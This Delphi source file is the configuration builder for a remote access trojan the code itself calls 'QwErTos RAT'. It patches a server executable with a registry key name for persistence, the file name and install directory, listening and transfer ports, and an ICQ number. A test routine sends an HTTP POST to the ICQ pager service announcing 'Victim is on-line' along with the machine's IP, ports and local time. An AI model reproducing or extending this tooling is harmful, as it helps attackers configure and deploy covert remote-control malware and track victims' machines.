(***********************************************************************
************************************************************************
****                                                                ****
****                                                                ****
****     File Name: untEditSrv.pas                                  ****
****                                                                ****
****     Author: //hIDRA_5                                          ****
****                                                                ****
****     Description: Unit main of Edit server                      ****
****                                                                ****
****                                                                ****
************************************************************************
************************************************************************)

unit untEditSrv;

interface

uses
  Windows, SysUtils, Classes, Controls, Forms, StdCtrls,
  Buttons, ExtCtrls, ScktComp, Dialogs, Winsock;

type
  TaPInAddr = array [0..10] of PInAddr;
  PaPInAddr = ^TaPInAddr;
  
  TfrmEditSrv = class(TForm)
    GruSettings: TGroupBox;
    SavDlg: TSaveDialog;
    OpnDlg: TOpenDialog;
    GruFile: TGroupBox;
    EdtFileName: TEdit;
    SpdOpen: TSpeedButton;
    SpdReadSettings: TSpeedButton;
    ChkClose: TCheckBox;
    SpdSave: TSpeedButton;
    SpdSaveNew: TSpeedButton;
    SpdClose: TSpeedButton;
    ClientPager: TClientSocket;
    ChkEnableICQ: TCheckBox;
    GruICQ: TGroupBox;
    LblUIN: TLabel;
    SpdTestNotify: TSpeedButton;
    EdtUIN: TEdit;
    GruSrv: TGroupBox;
    LblSrvP: TLabel;
    LblSrvF: TLabel;
    EdtSrvPort: TEdit;
    EdtSrvFileName: TEdit;
    RdoInstall: TRadioGroup;
    EdtRegKey: TEdit;
    LblSrvRegKey: TLabel;
    PntStatus: TPanel;
    LblUPPort: TLabel;
    EdtUPPort: TEdit;
    procedure FormCreate(Sender: TObject);
    procedure SpdCloseClick(Sender: TObject);
    procedure ChkEnableICQClick(Sender: TObject);
    procedure EnableICQNotify(mvEnable:Boolean);
    procedure SpdOpenClick(Sender: TObject);
    procedure SpdReadSettingsClick(Sender: TObject);
    procedure SpdSaveClick(Sender: TObject);
    procedure SpdTestNotifyClick(Sender: TObject);
    procedure ClientPagerConnect(Sender: TObject; Socket: TCustomWinSocket);
    procedure ReadFile(lpFileName:string;var lpFileBuffer:string);
    procedure ShowSettings(lpFileName:string);
    procedure SaveSettings(lpFileName:string;NewFile:string);
    function AdjustString(lpString:string; lpSize:integer):string;
    function CanEdit:Boolean;
    procedure ClientPagerError(Sender: TObject; Socket: TCustomWinSocket;
      ErrorEvent: TErrorEvent; var ErrorCode: Integer);
    procedure ClientPagerConnecting(Sender: TObject;
      Socket: TCustomWinSocket);
    procedure ClientPagerLookup(Sender: TObject; Socket: TCustomWinSocket);
    function InternetConnected:Boolean;
    function ValidFile(cPos:longint):Boolean;
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  frmEditSrv: TfrmEditSrv;

const
  ICQ_NUMBER:string = 'icq_uin='; // size = 10 bytes
  ICQ_ON:string = 'icq_on='; // size = 1 bytes
  INSTALL_DIR:string = 'inst_dir='; // size = 1 bytes
  REG_KEY_NAME:string = 'key_name='; // size = 30 bytes
  SRV_FILE:string = 'srv_file='; // size = 30 bytes
  SRV_PORT:string = 'srv_port='; // size = 5 bytes
  TRNF_PORT:string = 'tnsf_port='; // size = 5 bytes
  InvalidChars:array [0..8] of shortstring = ('\','/',':','*','?','"','<','>','|');

implementation

{$R *.DFM}

function LocalIP:string;
var
    phe : PHostEnt;
    pptr : PaPInAddr;
    Buffer : array [0..63] of char;
    I : Integer;
    GInitData : TWSADATA;
begin
    WSAStartup($101, GInitData);
    Result := '';
    GetHostName(Buffer, SizeOf(Buffer));
    phe :=GetHostByName(buffer);
    if phe = nil then
    begin
       Exit;
    end;
    pptr := PaPInAddr(Phe^.h_addr_list);
    I := 0;
    while pptr^[I] <> nil do
    begin
       Application.ProcessMessages;
       result:=StrPas(inet_ntoa(pptr^[I]^));
       Inc(I);
    end;
    WSACleanup;
end;

procedure TfrmEditSrv.FormCreate(Sender: TObject);
begin
   SpdOpen.Height:=EdtFileName.Height;
   Caption:='Edit serveur';
   Application.Title:='Edit serveur';
   PntStatus.Caption:='Edit serveur';
   EnableICQNotify(False);
end;

procedure TfrmEditSrv.SpdCloseClick(Sender: TObject);
begin
   Close;
end;

procedure TfrmEditSrv.ChkEnableICQClick(Sender: TObject);
begin
   EnableICQNotify(ChkEnableICQ.State = cbChecked);
end;

procedure TfrmEditSrv.EnableICQNotify(mvEnable:Boolean);
begin
   LblUIN.Enabled:=mvEnable;
   EdtUIN.Enabled:=mvEnable;
   SpdTestNotify.Enabled:=mvEnable;
end;

procedure TfrmEditSrv.SpdOpenClick(Sender: TObject);
begin
   if OpnDlg.Execute then
      EdtFileName.Text:=OpnDlg.FileName;
end;

procedure TfrmEditSrv.SpdReadSettingsClick(Sender: TObject);
var
   cFile:string;
begin
   cFile:=EdtFileName.Text;
   if not FileExists(cFile) then
   begin
      MessageBox(handle,'Ce fichier n''existe pas.',PChar(Caption),MB_ICONERROR);
      Exit;
   end;
   ShowSettings(cFile);
end;

procedure TfrmEditSrv.SpdSaveClick(Sender: TObject);
var
   cFile,nFile:string;
   l:Integer;
begin
   cFile:=EdtFileName.Text;
   if not FileExists(cFile) then
   begin
      MessageBox(handle,'Ce fichier n''existe pas...',PChar(Caption),MB_ICONERROR);
      Exit;
   end;
   if not CanEdit then Exit;
   if Sender = SpdSave then
      SaveSettings(cFile,cFile)
   else
   begin
      if not SavDlg.Execute then Exit;
      nFile:=SavDlg.FileName;
      l:=Length(nFile);
      if UpperCase(Copy(nFile,l - 3,l)) <> '.EXE' then
         nFile:=nFile + '.exe';
      SaveSettings(cFile,nFile);
   end;
   if ChkClose.State = cbChecked then
      Close;
end;

procedure TfrmEditSrv.SpdTestNotifyClick(Sender: TObject);
begin
   if not InternetConnected then
   begin
      MessageBox(handle,'Connect d''abord INTERNET.',PChar(Caption),MB_ICONERROR);
      Exit;
   end;
   if StrToIntDef(Trim(EdtUIN.Text),-1) < 0 then
   begin
      MessageBox(handle,'Invalide ICQ UIN.',PChar(Caption),MB_ICONERROR);
      EdtUIN.SetFocus;
      Exit;
   end;
   ClientPager.Socket.Close;
   while ClientPager.Active do
      ClientPager.Active:=False;
   ClientPager.Host:='wwp.mirabilis.com';
   ClientPager.Port:=80;
   try
      ClientPager.Open;
   except
      on Exception do
         ClientPager.Close;
   end;
end;

procedure TfrmEditSrv.ClientPagerConnect(Sender: TObject;
  Socket: TCustomWinSocket);
var
   cData,cSend,CrLf,cSubject,cMessage:string;
begin
   PntStatus.Caption:='Connected to wwp.mirabilis.com...';
   CrLf:=#13#10;
   cMessage:='Victim+is+on-line:' + CrLf + 'IP:' + ClientPager.Socket.LocalAddress +
             CrLf + 'Connection+port:' + EdtSrvPort.Text +
             CrLf + 'Upload/download+port:' + EdtUPPort.Text +
             CrLf + 'Local+time:' + DateToStr(Date) + '+-+' + TimeToStr(Time);
   cSubject:='Test+of+notification';
   cData:='from=QwErTos+RAT&fromemail=Latinus@Latinus.br&subject=' + cSubject + '&body=' + cMessage + '&to=' + Trim(EdtUIN.Text) + '&Send=' + '''';
   cSend:='POST /scripts/WWPMsg.dll HTTP/1.0' + CrLf;
   cSend:=cSend + 'Referer: http://wwp.mirabilis.com' + CrLf;
   cSend:=cSend + 'User-Agent: Mozilla/4.06 (Win95; I)' + CrLf;
   cSend:=cSend + 'Connection: Keep-Alive' + CrLf;
   cSend:=cSend + 'Host: wwp.mirabilis.com:80' + CrLf;
   cSend:=cSend + 'Content-type: application/x-www-form-urlencoded' + CrLf;
   cSend:=cSend + 'Content-length: ' + IntToStr(Length(cData)) + CrLf;
   cSend:=cSend + 'Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*' + CrLf + CrLf;
   cSend:=cSend + cData + CrLf + CrLf + CrLf + CrLf;
   ClientPager.Socket.SendText(cSend);
   PntStatus.Caption:='Pager is sent...';
end;

procedure TfrmEditSrv.ReadFile(lpFileName:string;var lpFileBuffer:string);
var
   lpFile:File of Char;
   cBuffer:array [1..1024] of Char;
   r,Len:LongInt;
begin
   lpFileBuffer:='';
   AssignFile(lpFile,lpFileName);
   Reset(lpFile);
   Len:=FileSize(lpFile);
   while not Eof(lpFile) do
   begin
      BlockRead(lpFile,cBuffer,1024,r);
      lpFileBuffer:=lpFileBuffer + string(cBuffer)
   end;
   CloseFile(lpFile);
   if Length(lpFileBuffer) > Len then
      lpFileBuffer:=Copy(lpFileBuffer,1,Len);
end;                                      

procedure TfrmEditSrv.ShowSettings(lpFileName:string);
var
   fContent:string;
   p:longint;
   cICQ,ICQOn,IntDir,RegKey,SrvFile,SrvPort,TrnfPort:string;
begin
   ReadFile(lpFileName,fContent);

   p:=Pos(ICQ_NUMBER,fContent);
   if not ValidFile(p) then Exit;
   cICQ:=Trim(Copy(fContent,p + Length(ICQ_NUMBER),10));

   p:=Pos(ICQ_ON,fContent);
   if not ValidFile(p) then Exit;
   ICQOn:=Trim(Copy(fContent,p + Length(ICQ_ON),1));

   p:=Pos(INSTALL_DIR,fContent);
   if not ValidFile(p) then Exit;
   IntDir:=Trim(Copy(fContent,p + Length(INSTALL_DIR),1));

   p:=Pos(REG_KEY_NAME,fContent);
   if not ValidFile(p) then Exit;
   RegKey:=Trim(Copy(fContent,p + Length(REG_KEY_NAME),30));

   p:=Pos(SRV_FILE,fContent);
   if not ValidFile(p) then Exit;
   SrvFile:=Trim(Copy(fContent,p + Length(SRV_FILE),30));

   p:=Pos(SRV_PORT,fContent);
   if not ValidFile(p) then Exit;
   SrvPort:=Trim(Copy(fContent,p + Length(SRV_PORT),5));

   p:=Pos(TRNF_PORT,fContent);
   if not ValidFile(p) then Exit;
   TrnfPort:=Trim(Copy(fContent,p + Length(TRNF_PORT),5));

   ChkEnableICQ.State:=TCheckBoxState(StrToIntDef(ICQOn,0));
   EnableICQNotify(ChkEnableICQ.State = cbChecked);
   EdtUIN.Text:=cICQ;
   if IntDir = 'W' then
      RdoInstall.ItemIndex:=0
   else
      RdoInstall.ItemIndex:=1;
   EdtRegKey.Text:=RegKey;
   EdtSrvFileName.Text:=SrvFile;
   EdtSrvPort.Text:=SrvPort;
   EdtUPPort.Text:=TrnfPort;
   fContent:=EmptyStr;
end;

procedure TfrmEditSrv.SaveSettings(lpFileName:string;NewFile:string);
var
   fContent:string;
   p,l:longint;
   cICQ,IntDir,RegKey,SrvFile,SrvPort,TrnfPort:string;
   lpFile:TextFile;
begin
   ReadFile(lpFileName,fContent);
   l:=Length(fContent);

   cICQ:=Trim(EdtUIN.Text);
   cICQ:=AdjustString(cICQ,10);

   p:=Pos(ICQ_NUMBER,fContent);
   if not ValidFile(p) then Exit;
   fContent:=Copy(fContent,1,p + Length(ICQ_NUMBER) - 1) + cICQ + Copy(fContent,p + Length(ICQ_NUMBER) + 10,l);

   p:=Pos(ICQ_ON,fContent);
   if not ValidFile(p) then Exit;
   fContent:=Copy(fContent,1,p + Length(ICQ_ON) - 1) + IntToStr(Integer(ChkEnableICQ.State)) + Copy(fContent,p + Length(ICQ_ON) + 1,l);

   IntDir:=RdoInstall.Items[RdoInstall.ItemIndex];

   p:=Pos(INSTALL_DIR,fContent);
   if not ValidFile(p) then Exit;
   fContent:=Copy(fContent,1,p + Length(INSTALL_DIR) - 1) + UpperCase(IntDir[1]) + Copy(fContent,p + Length(INSTALL_DIR) + 1,l);

   RegKey:=Trim(EdtRegKey.Text);
   RegKey:=AdjustString(RegKey,30);

   p:=Pos(REG_KEY_NAME,fContent);
   if not ValidFile(p) then Exit;
   fContent:=Copy(fContent,1,p + Length(REG_KEY_NAME) - 1) + RegKey + Copy(fContent,p + Length(REG_KEY_NAME) + 30,l);

   SrvFile:=Trim(EdtSrvFileName.Text);
   SrvFile:=AdjustString(SrvFile,30);

   p:=Pos(SRV_FILE,fContent);
   if not ValidFile(p) then Exit;
   fContent:=Copy(fContent,1,p + Length(SRV_FILE) - 1) + SrvFile + Copy(fContent,p + Length(SRV_FILE) + 30,l);

   SrvPort:=Trim(EdtSrvPort.Text);
   SrvPort:=AdjustString(SrvPort,5);

   p:=Pos(SRV_PORT,fContent);
   if not ValidFile(p) then Exit;
   fContent:=Copy(fContent,1,p + Length(SRV_PORT) - 1) + SrvPort + Copy(fContent,p + Length(SRV_PORT) + 5,l);

   TrnfPort:=Trim(EdtUPPort.Text);
   TrnfPort:=AdjustString(TrnfPort,5);
   p:=Pos(TRNF_PORT,fContent);
   if not ValidFile(p) then Exit;
   fContent:=Copy(fContent,1,p + Length(TRNF_PORT) - 1) + TrnfPort + Copy(fContent,p + Length(TRNF_PORT) + 5,l);


   AssignFile(lpFile,NewFile);
   ReWrite(lpFile);
   Writeln(lpFile,fContent);
   CloseFile(lpFile);

   fContent:=EmptyStr;
end;

function TfrmEditSrv.AdjustString(lpString:string; lpSize:integer):string;
var
   l:integer;
begin
   l:=Length(lpString);
   if l = lpSize then
   begin
      AdjustString:=lpString;
      Exit;
   end;
   if l < lpSize then
   begin
      AdjustString:=lpString + StringOfChar(' ',lpSize - l);
      Exit;
   end;
   if l > lpSize then
   begin
      AdjustString:=Copy(lpString,1,lpSize);
      Exit;
   end;
end;

function TfrmEditSrv.CanEdit:Boolean;
var
   LongSrv,LongUP:Longint;
   i:Integer;
   f:string;
   bFile:Boolean;
begin
   CanEdit:=False;
   if (ChkEnableICQ.Checked) and (StrToIntDef(Trim(EdtUIN.Text),-1) < 0) then
   begin
      MessageBox(handle,'Please, enter an valid ICQ UIN.',PChar(Caption),MB_ICONERROR);
      EdtUIN.SetFocus;
      Exit;
   end;
   LongSrv:=StrToIntDef(Trim(EdtSrvPort.Text),-1);
   if (LongSrv <= 0) or (LongSrv > 65535) then
   begin
      MessageBox(handle,'Port invalide (1 a 65535).',PChar(Caption),MB_ICONERROR);
      EdtSrvPort.SetFocus;
      Exit;
   end;
   LongUP:=StrToIntDef(Trim(EdtUPPort.Text),-1);
   if (LongUP <= 0) or (LongUP > 65535) then
   begin
      MessageBox(handle,'upload/download port(1 to 65535).',PChar(Caption),MB_ICONERROR);
      EdtUPPort.SetFocus;
      Exit;
   end;
   if LongSrv = LongUP then
   begin
      MessageBox(handle,'Please, doesn''t use the server port equal upload/download port.',PChar(Caption),MB_ICONERROR);
      EdtUPPort.SetFocus;
      Exit;
   end;
   bFile:=False;
   f:=Trim(EdtSrvFileName.Text);
   for i:=0 to 8 do
      if Pos(InvalidChars[i],f) > 0 then
      begin
         bFile:=True;
         Break;
      end;
   LongSrv:=Length(f);
   if bFile or (LongSrv <= 4) or (Copy(UpperCase(f),LongSrv - 3,LongSrv) <> '.EXE') then
   begin
      MessageBox(handle,'Please, enter an valid server file name(*.exe).',PChar(Caption),MB_ICONERROR);
      EdtSrvFileName.SetFocus;
      Exit;
   end;
   if Trim(EdtRegKey.Text) = '' then
   begin
      MessageBox(handle,'Please, enter an valid registry key name.',PChar(Caption),MB_ICONERROR);
      EdtRegKey.SetFocus;
      Exit;
   end;
   CanEdit:=True;
end;

procedure TfrmEditSrv.ClientPagerError(Sender: TObject;
  Socket: TCustomWinSocket; ErrorEvent: TErrorEvent;
  var ErrorCode: Integer);
begin
   ErrorCode:=0;
end;

procedure TfrmEditSrv.ClientPagerConnecting(Sender: TObject;
  Socket: TCustomWinSocket);
begin
   PntStatus.Caption:='Connecting to wwp.mirabilis.com...';
end;

procedure TfrmEditSrv.ClientPagerLookup(Sender: TObject;
  Socket: TCustomWinSocket);
begin
   PntStatus.Caption:='Finding wwp.mirabilis.com...';
end;

function TfrmEditSrv.InternetConnected:Boolean;
var
   S:string;
begin
   S:=Copy(LocalIP,1,3);
   Result:=(S < '255') and (S > '127');
end;

function TfrmEditSrv.ValidFile(cPos:longint):Boolean;
var
   r:Boolean;
begin
   r:=cPos > 0;
   if not r then
      MessageBox(handle,'Please, select an valid file.',PChar(Caption),MB_ICONERROR);
   ValidFile:=r;
end;

end.
